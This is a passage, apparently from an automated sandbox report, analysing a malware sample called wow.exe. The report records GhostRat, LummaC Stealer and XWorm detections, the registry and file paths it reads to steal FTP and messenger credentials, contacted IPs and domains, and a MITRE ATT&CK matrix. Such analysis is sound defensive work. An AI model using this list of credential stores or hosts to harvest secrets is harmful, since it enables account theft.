                            Source: C:\Windows\SysWOW64\svchost.exeFile opened: HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 8 Professional\QCToolbar
                            Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Roaming\BitKinex\
                            Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Roaming\TurboFTP\
                            Source: C:\Windows\SysWOW64\svchost.exeFile opened: HKEY_CURRENT_USER\Software\TurboFTP
                            Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\FTP Explorer\
                            Source: C:\Windows\SysWOW64\svchost.exeFile opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts
                            Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\SmartFTP\Client 2.0\Favorites\
                            Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\ProgramData\GPSoftware\Directory Opus\ConfigFiles\
                            Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Roaming\Frigate3\
                            Source: C:\Windows\SysWOW64\svchost.exeFile opened: HKEY_CURRENT_USER\SOFTWARE\Far\Plugins\FTP\Hosts
                            Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\GPSoftware\Directory Opus\Layouts\System\
                            Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\ProgramData\SmartFTP\
                            Tries to steal Instant Messenger accounts or passwords
                            Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Roaming\Miranda\
                            Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
                            Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\Paltalk
                            Source: Yara matchFile source: 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: wow.exe PID: 6092, type: MEMORYSTR
                            Source: Yara matchFile source: C:\Users\user\Downloads\haus\hausey.txt, type: DROPPED

                            Remote Access Functionality

                            barindex
                            Yara detected GhostRat
                            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                            Yara detected LummaC Stealer
                            Source: Yara matchFile source: 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: wow.exe PID: 6092, type: MEMORYSTR
                            Source: Yara matchFile source: C:\Users\user\Downloads\haus\hausey.txt, type: DROPPED
                            Yara detected XWorm
                            Source: Yara matchFile source: 9.3.wow.exe.1d428d2b790.97.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 28.2.Enalib.exe.7890000.3.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 9.3.wow.exe.1d428d2b790.97.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 28.2.Enalib.exe.28fef3c.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 28.2.Enalib.exe.7890000.3.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 19.0.vapo.exe.e0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 28.2.Enalib.exe.28fef3c.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0000001C.00000002.2576679059.00000000028E4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000013.00000002.4639398920.00000000023BC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000018.00000002.4667714199.0000000002420000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000009.00000003.2331326155.000001D42C3A0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000009.00000003.2331326155.000001D42C380000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000009.00000003.2901512124.000001D428D1C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001C.00000002.2876237438.0000000007890000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000013.00000000.2272038750.00000000000E2000.00000002.00000001.01000000.0000002A.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000009.00000003.2349081758.000001D42C3A1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000009.00000003.2807337493.000001D428D1C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: wow.exe PID: 6092, type: MEMORYSTR
                            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\vapo.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\Downloads\haus\vapo.exe, type: DROPPED
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_00456B60 RpcServerUnregisterIf,EnterCriticalSection,RpcMgmtStopServerListening,RpcMgmtWaitServerListen,LeaveCriticalSection,I_RpcMapWin32Status,16_2_00456B60
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_00456AF0 EnterCriticalSection,RpcServerListen,LeaveCriticalSection,I_RpcMapWin32Status,16_2_00456AF0
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_00456BB0 RpcServerUnregisterIfEx,EnterCriticalSection,RpcMgmtStopServerListening,RpcMgmtWaitServerListen,LeaveCriticalSection,I_RpcMapWin32Status,16_2_00456BB0

                            Mitre Att&ck Matrix

                            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                            Gather Victim Identity Information111
                            Scripting                            		Valid Accounts131
                            Windows Management Instrumentation                            		111
                            Scripting                            		1
                            DLL Side-Loading                            		1
                            Disable or Modify Tools                            		2
                            OS Credential Dumping                            		2
                            System Time Discovery                            		Remote Services11
                            Archive Collected Data                            		1
                            Web Service                            		Exfiltration Over Other Network MediumAbuse Accessibility Features
                            CredentialsDomainsDefault Accounts13
                            Native API                            		1
                            DLL Side-Loading                            		1
                            Access Token Manipulation                            		111
                            Deobfuscate/Decode Files or Information                            		2
                            Credentials in Registry                            		1
                            Account Discovery                            		Remote Desktop Protocol2
                            Data from Local System                            		14
                            Ingress Tool Transfer                            		Exfiltration Over BluetoothNetwork Denial of Service
                            Email AddressesDNS ServerDomain Accounts1
                            Shared Modules                            		13
                            Windows Service                            		13
                            Windows Service                            		41
                            Obfuscated Files or Information                            		1
                            Credentials In Files                            		3
                            File and Directory Discovery                            		SMB/Windows Admin Shares1
                            Clipboard Data                            		21
                            Encrypted Channel                            		Automated ExfiltrationData Encrypted for Impact
                            Employee NamesVirtual Private ServerLocal Accounts1
                            Exploitation for Client Execution                            		1
                            Scheduled Task/Job                            		312
                            Process Injection                            		32
                            Software Packing                            		NTDS149
                            System Information Discovery                            		Distributed Component Object ModelInput Capture11
                            Non-Standard Port                            		Traffic DuplicationData Destruction
                            Gather Victim Network InformationServerCloud Accounts2
                            Command and Scripting Interpreter                            		1
                            Registry Run Keys / Startup Folder                            		1
                            Scheduled Task/Job                            		1
                            Timestomp                            		LSA Secrets1
                            Query Registry                            		SSHKeylogging4
                            Non-Application Layer Protocol                            		Scheduled TransferData Encrypted for Impact
                            Domain PropertiesBotnetReplication Through Removable Media1
                            Scheduled Task/Job                            		RC Scripts1
                            Registry Run Keys / Startup Folder                            		1
                            DLL Side-Loading                            		Cached Domain Credentials481
                            Security Software Discovery                            		VNCGUI Input Capture125
                            Application Layer Protocol                            		Data Transfer Size LimitsService Stop
                            DNSWeb ServicesExternal Remote Services2
                            Service Execution                            		Startup ItemsStartup Items1
                            Masquerading                            		DCSync371
                            Virtualization/Sandbox Evasion                            		Windows Remote ManagementWeb Portal Capture1
                            Proxy                            		Exfiltration Over C2 ChannelInhibit System Recovery
                            Network Trust DependenciesServerlessDrive-by Compromise4
                            PowerShell                            		Scheduled Task/JobScheduled Task/Job1
                            Modify Registry                            		Proc Filesystem3
                            Process Discovery                            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt371
                            Virtualization/Sandbox Evasion                            		/etc/passwd and /etc/shadow1
                            Application Window Discovery                            		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                            IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                            Access Token Manipulation                            		Network Sniffing1
                            System Owner/User Discovery                            		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                            Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd312
                            Process Injection                            		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                            Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task1
                            Hidden Files and Directories                            		KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking
                            Determine Physical LocationsVirtual Private ServerCompromise Hardware Supply ChainUnix ShellSystemd TimersSystemd Timers1
                            NTFS File Attributes                            		GUI Input CapturePermission Groups DiscoveryReplication Through Removable MediaEmail CollectionProxyExfiltration over USBNetwork Denial of Service

                            Behavior Graph

                            Hide Legend

                            Legend:

                            • Process
                            • Signature
                            • Created File
                            • DNS/IP Info
                            • Is Dropped
                            • Is Windows Process
                            • Number of created Registry Values
                            • Number of created Files
                            • Visual Basic
                            • Delphi
                            • Java
                            • .Net C# or VB.NET
                            • C, C++ or other language
                            • Is malicious
                            • Internet
                            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1600177 Sample: wow.exe Startdate: 27/01/2025 Architecture: WINDOWS Score: 100 113 pastebin.com 2->113 115 urlhaus.abuse.ch 2->115 117 22 other IPs or domains 2->117 135 Suricata IDS alerts for network traffic 2->135 137 Found malware configuration 2->137 139 Malicious sample detected (through community Yara rule) 2->139 143 26 other signatures 2->143 11 wow.exe 93 2->11         started        15 vapo.exe 2->15         started        17 OpenWith.exe 15 2->17         started        19 GameBarPresenceWriter.exe 2->19         started        signatures3 141 Connects to a pastebin service (likely for C&C) 113->141 process4 file5 105 C:\Users\...\_quoting_c.cp311-win_amd64.pyd, PE32+ 11->105 dropped 107 C:\Users\user\AppData\...\win32evtlog.pyd, PE32+ 11->107 dropped 109 C:\Users\user\AppData\Local\...\win32api.pyd, PE32+ 11->109 dropped 111 30 other files (28 malicious) 11->111 dropped 171 Creates HTML files with .exe extension (expired dropper behavior) 11->171 173 Found pyInstaller with non standard icon 11->173 21 wow.exe 2 49 11->21         started        26 conhost.exe 11->26         started        175 Multi AV Scanner detection for dropped file 15->175 signatures6 process7 dnsIp8 121 5.252.155.72, 49787, 80 WORLDSTREAMNL Russian Federation 21->121 123 121.127.231.160, 49780, 80 SUNHK-DATA-AS-APSunNetworkHongKongLimited-HongKong Hong Kong 21->123 125 53 other IPs or domains 21->125 91 C:\Users\user\Downloads\haus\vapo.exe, PE32 21->91 dropped 93 C:\Users\user\Downloads\haus\traf.exe, PE32 21->93 dropped 95 C:\Users\user\Downloads\haus\sel1.exe, PE32 21->95 dropped 97 10 other malicious files 21->97 dropped 145 Found Tor onion address 21->145 147 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 21->147 28 sel1.exe 21->28         started        31 conhost.exe 21->31         started        35 amada2.exe 21->35         started        37 10 other processes 21->37 file9 signatures10 process11 dnsIp12 177 Multi AV Scanner detection for dropped file 28->177 179 Found evasive API chain (may stop execution after checking volume information) 28->179 181 Contain functionality to detect virtual machines 28->181 193 2 other signatures 28->193 39 svchost.exe 28->39         started        127 pastebin.com 104.20.4.235 CLOUDFLARENETUS United States 31->127 83 C:\ProgramData\Dllhost\winlogson.exe, PE32+ 31->83 dropped 85 C:\ProgramData\Dllhost\WinRing0x64.sys, PE32+ 31->85 dropped 183 Sample is not signed and drops a device driver 31->183 43 cmd.exe 31->43         started        45 cmd.exe 31->45         started        47 cmd.exe 31->47         started        87 C:\ProgramData\1be588a5b7\gdsun.exe, PE32 35->87 dropped 185 Creates / moves files in alternative data streams (ADS) 35->185 49 gdsun.exe 35->49         started        89 C:\Users\user\AppData\Roaming\vapo.exe, PE32 37->89 dropped 187 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 37->187 189 Suspicious powershell command line found 37->189 191 Wscript starts Powershell (via cmd or directly) 37->191 195 3 other signatures 37->195 51 powershell.exe 37->51         started        54 powershell.exe 37->54         started        56 powershell.exe 37->56         started        58 7 other processes 37->58 file13 signatures14 process15 dnsIp16 99 C:\Users\user\AppData\Roaming743A7.exe, PE32 39->99 dropped 149 System process connects to network (likely due to code injection or exploit) 39->149 151 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 39->151 153 Creates an undocumented autostart registry key 39->153 169 5 other signatures 39->169 60 WerFault.exe 39->60         started        155 Wscript starts Powershell (via cmd or directly) 43->155 157 Encrypted powershell cmdline option found 43->157 73 2 other processes 43->73 75 2 other processes 45->75 62 conhost.exe 47->62         started        159 Antivirus detection for dropped file 49->159 161 Multi AV Scanner detection for dropped file 49->161 163 Machine Learning detection for dropped file 49->163 165 Opens the same file many times (likely Sandbox evasion) 49->165 64 reg.exe 49->64         started        119 filedn.eu 45.131.244.47 PCLOUDLU Luxembourg 51->119 167 Found suspicious powershell code related to unpacking or dynamic code loading 51->167 67 conhost.exe 51->67         started        101 C:\ProgramData\1be588a5b7\T.exe, PE32 54->101 dropped 69 conhost.exe 54->69         started        103 C:\ProgramData\1be588a5b7nalib.exe, PE32 56->103 dropped 71 conhost.exe 56->71         started        77 5 other processes 58->77 file17 signatures18 process19 signatures20 129 Creates an undocumented autostart registry key 64->129 79 conhost.exe 64->79         started        131 Loading BitLocker PowerShell Module 73->131 133 Powershell drops PE file 73->133 81 WmiPrvSE.exe 73->81         started        process21

                            Screenshots

                            Thumbnails

                            This section contains all screenshots as thumbnails, including those not shown in the slideshow.